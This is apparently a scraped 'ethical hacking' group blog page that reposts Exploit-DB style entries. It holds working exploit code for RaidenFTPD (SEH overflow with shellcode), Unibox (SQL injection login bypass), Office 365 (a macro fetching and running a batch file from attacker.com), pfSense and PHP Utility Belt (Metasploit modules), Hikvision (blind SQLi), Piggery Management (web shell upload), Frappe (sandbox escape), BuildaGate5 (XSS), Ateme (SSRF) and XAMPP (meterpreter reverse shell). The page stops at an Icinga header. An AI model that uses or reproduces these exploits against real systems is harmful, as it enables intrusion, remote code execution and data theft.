# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045
# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe
#!/usr/bin/env python3
from struct import pack
crash = 2000
offset = 497
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
shellcode = b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"
nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll
buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash -len(buffer))
file_payload = open("exploit-raiden.txt", 'wb')
print("[*] Creating the .txt file for out payload")
file_payload.write(buffer)
print("[*] Writing malicious payload to the .txt file")
file_payload.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149327
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author Contact : arkinux01@gmail.com
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link:
https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635
The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
SQL Injection, which can lead to unauthorised admin access for attackers.
The vulnerability occurs because of not validating or sanitising the user
input in the username field of the login page and directly sending the
input to the backend server and database.
## How to Reproduce
Step 1 : Visit the login page and check the version, whether it is 3.0,
3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
enter any random password.
Step 3 : Fill in the captcha and hit login. After hitting login, you have
been successfully logged in as an administrator and can see anyone's user
data, modify data, revoke access, etc.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------
POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private
<!DOCTYPE html>
<html lang="en">
html content
</html>
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious
WORD file in the Outlook app which is a part of Microsoft Office 365
and easily can trick the victim to click on it - opening it and
executing a very dangerous shell command, in the background of the
local PC. This execution is without downloading this malicious file,
and this is a potential problem and a very dangerous case! This can be
the end of the victim's PC, it depends on the scenario.
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
&& .\salaries.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
## Time spend:
00:35:00
# Exploit Title: pfSense v2.7.0 - OS Command Injection
#Exploit Author: Emir Polat
# CVE-ID : CVE-2023-27253
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'pfSense Restore RRD Data Command Injection',
'Description' => %q{
This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of
pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore"
privilege to execute arbitrary operating system commands as the "root" user.
This module has been tested successfully on version 2.6.0-RELEASE.
},
'License' => MSF_LICENSE,
'Author' => [
'Emir Polat', # vulnerability discovery & metasploit module
],
'References' => [
['CVE', '2023-27253'],
['URL', 'https://redmine.pfsense.org/issues/13935'],
['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
],
'DisclosureDate' => '2023-03-18',
'Platform' => ['unix'],
'Arch' => [ ARCH_CMD ],
'Privileged' => true,
'Targets' => [
[ 'Automatic Target', {}]
],
'Payload' => {
'BadChars' => "\x2F\x27",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat'
}
},
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)
register_options [
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
]
end
def check
unless login
return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
end
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
'method' => 'GET',
'keep_cookies' => true
)
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
unless res&.body&.include?('Diagnostics: ')
return Exploit::CheckCode::Safe('Vulnerable module not reachable')
end
version = detect_version
unless version
return Exploit::CheckCode::Detected('Unable to get the pfSense version')
end
unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
end
Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
end
def login
# Skip the login process if we are already logged in.
return true if @logged_in
csrf = get_csrf('index.php', 'GET')
unless csrf
print_error('Could not get the expected CSRF token for index.php when attempting login!')
return false
end
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' => {
'__csrf_magic' => csrf,
'usernamefld' => datastore['USERNAME'],
'passwordfld' => datastore['PASSWORD'],
'login' => ''
},
'keep_cookies' => true
)
if res && res.code == 302
@logged_in = true
true
else
false
end
end
def detect_version
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'keep_cookies' => true
)
# If the response isn't a 200 ok response or is an empty response, just return nil.
unless res && res.code == 200 && res.body
return nil
end
if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
nil
else
version
end
end
def get_csrf(uri, methods)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, uri),
'method' => methods,
'keep_cookies' => true
)
unless res && res.body
return nil # If no response was returned or an empty response was returned, then return nil.
end
# Try regex match the response body and save the match into a variable named csrf.
if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
return nil # No match could be found, so the variable csrf won't be defined.
else
return csrf
end
end
def drop_config
csrf = get_csrf('diag_backup.php', 'GET')
unless csrf
fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
end
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'keep_cookies' => true
)
if res && res.code == 200 && res.body =~ /<rrddatafile>/
return res.body
else
return nil
end
end
def exploit
unless login
fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
end
csrf = get_csrf('diag_backup.php', 'GET')
unless csrf
fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
end
config_data = drop_config
if config_data.nil?
fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
end
if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
end
config_data.gsub!(' ', '${IFS}')
send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'keep_cookies' => true
)
if res
print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
end
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Utility Belt Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in PHP Utility Belt,
which is a set of tools for PHP developers and should not be installed in a
production environment, since this application runs arbitrary PHP code as an
intended functionality.
},
'Author' =>
[
'WICS', # initial discovery
'Jay Turla' # msf
],
'References' =>
[
['EDB', '38901'],
['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
],
'DisclosureDate' => 'Aug 12 2015',
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false,
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'Targets' =>
[
['PHP Utility Belt', {}]
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
], self.class)
end
def check
txt = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{txt};")
if res && res.body.include?(txt)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
http_send_command(payload.encoded)
end
def http_send_command(cmd)
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'code' => cmd
}
)
end
end
# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Vendor Homepage: https://www.hikvision.com
# Software Link: N/A
# Refence Link: https://cve.report/CVE-2022-28171
# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
'''
Vendor Description:
Hikvision is a world-leading surveillance manufacturer and supplier of
video surveillance and Internet of Things (IoT) equipment for civilian and
military purposes.
Some Hikvision Hybrid SAN products were vulnerable to multiple remote code
execution vulnerabilities such as command injection, Blind SQL injection,
HTTP request smuggling, and reflected cross-site scripting.
This resulted in remote code execution that allows an adversary to execute
arbitrary operating system commands and more. However, an adversary must be
on the same network to leverage this vulnerability to execute arbitrary
commands.
Vulnerability description:
A manual test confirmed that The download type parameter was vulnerable to
Blind SQL injection.I created a Python script to automate and enumerate SQL
versions as the Application was behind the firewall and block all the
requests from SQLmap.
Request Body:
GET
/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'
HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
POC:
'''
import requests
import time
url = "http://X.X.X.X:2004/web/log/dynamic_log.php"
# Function to check if the response time is greater than the specified delay
def is_response_time_delayed(response_time, delay):
return response_time >= delay
# Function to perform blind SQL injection and check the response time
def perform_blind_sql_injection(payload):
proxies = {
'http': 'http://localhost:8080',
'https': 'http://localhost:8080',
}
params = {
'target': 'makeMaintainLog',
'downloadtype': payload
}
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
'Connection': 'close'
}
start_time = time.time()
response = requests.get(url, headers=headers, params=params,
proxies=proxies)
end_time = time.time()
response_time = end_time - start_time
return is_response_time_delayed(response_time, 20)
# Enumerate the MySQL version
def enumerate_mysql_version():
version_Name = ''
sleep_time = 10 # Sleep time is 10 seconds
payloads = [
f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},
SLEEP({sleep_time}), 0))-- -"
for i in range(1, 11)
for mid in range(256)
]
for payload in payloads:
if perform_blind_sql_injection(payload):
mid = payload.split("=")[-1].split(",")[0]
version_Name += chr(int(mid))
return version_Name
# Enumeration is completed
version_Name = enumerate_mysql_version()
print("MySQL version is:", version_Name)
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/
echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo
if [[ $1 == '' ]]; then
echo "No URL specified!"
exit
fi
base_url=$1
unauth_file_upload() {
# CVE-2023-37629 - File upload vuln
echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
echo "done"
curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
if [[ $req == "200" ]]; then
echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
else
echo "Failed to upload a shell"
fi
}
req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
unauth_file_upload
else
echo "Error"
echo "Status Code: $req"
fi
# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.7
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36164
# PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto
C:\Users>sc qc MTAgentService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MTAgentService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MTAgentService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.7
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36165
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto
C:\Users>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MTSchedulerService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MTSchedulerService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
# Exploit Author: Sander Ferdinand
# Date: 2023-06-07
# Version: 13.4.0
# Vendor Homepage: http://erpnext.org
# Software Link: https://github.com/frappe/frappe/
# Tested on: Ubuntu 22.04
# CVE : none
Silly sandbox escape.
> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.
Requirements:
- 'System Manager' role (which is not necessarily the admin)
- Server config `server_script_enabled` set to `true` (likely)
Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload.
```python3
hax = "echo pwned > /tmp/pwned"
g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
for x in g:0
```
Context:
- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/
- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6
- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script
- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42
Bonus:
More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`:
```python3
hax = """
{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}
""".strip()
g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
for x in g:0
```
Which prints the Frappe config like database/redis credentials, etc.
In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163
#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
#Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.9.12.4
3.9.11.0
3.9.9.2
3.9.8.0
Summary: TITAN File is a multi-codec/format video transcoding
software, for mezzanine, STB and ABR VOD, PostProduction, Playout
and Archive applications. TITAN File is based on ATEME 5th Generation
STREAM compression engine and delivers the highest video quality
at minimum bitrates with accelerated parallel processing.
Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability
exists in the Titan File video transcoding software. The application
parses user supplied data in the job callback url GET parameter. Since
no validation is carried out on the parameter, an attacker can specify
an external domain and force the application to make an HTTP/DNS/File
request to an arbitrary destination. This can be used by an external
attacker for example to bypass firewalls and initiate a service, file
and network enumeration on the internal network through the affected
application.
Tested on: Microsoft Windows
NodeJS
Ateme KFE Software
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5781
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php
22.04.2023
--
curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
-H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
-H "User-Agent: sunee-mode" \
"https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"
Call to file://C:\\windows\\system.ini returned 0
---
HTTP from Server
----------------
POST / HTTP/1.1
Host: ssrftest.zeroscience.mk
Accept: */*
Content-Type: application/xml
Content-Length: 192
<?xml version='1.0' encoding='UTF-8' ?>
<update>
<id>0000</id>
<name>dummy test job</name>
<status>aborted</status>
<progress>50</progress>
<message>message</message>
</update>
# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/
Steps to Exploit:
1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell
C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto
// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
Volume in drive C has no label.
Volume Serial Number is 80B5-B405
Directory of C:\xampp\mysql\bin
[...]
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution
# Date: 8/07/2023
# Exploit Author: Dante Corona(Aka. cxdxnt)
# Software Link: https://github.com/Icinga/icingaweb2
# Vendor Homepage: https://icinga.com/
